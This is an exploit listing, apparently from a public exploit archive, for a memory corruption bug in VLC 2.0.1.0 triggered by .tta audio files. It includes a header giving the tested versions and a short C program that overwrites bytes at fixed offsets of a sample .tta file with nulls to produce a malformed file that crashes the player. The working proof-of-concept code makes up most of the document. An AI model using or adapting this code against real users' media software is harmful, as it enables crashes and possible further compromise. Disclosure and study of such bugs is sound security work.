|
# Exploit Title: VLC v. 2.0.1.0 .tta Memory Corruption # Date: 3/18/2012 # Author: Dan Fosco # Vendor or Software Link: www.videolan.org # Version: 2.0.1.0 # Category: local # Google dork: n/a # Tested on: Windows XP SP3 (64-bit) # Demo site: n/a
Tested on stable 2.0, 1.1.11, 2.0.1.0 (newest release as of 3/15/2012)
#include <stdio.h>
int main(int argc, char *argv[]) { FILE *f; f = fopen(argv[1], "r+");
fseek(f, 10, SEEK_SET); fputc('\x00', f);
fseek(f, 11, SEEK_SET); fputc('\x00', f);
fseek(f, 26, SEEK_SET); fputc('\x00', f);
fseek(f, 68, SEEK_SET); fputc('\x00', f);
fseek(f, 59, SEEK_SET); fputc('\x00', f);
fclose(f); return 0; }
//code updates .tta file, can find samples on videolan ftp server
|
|
|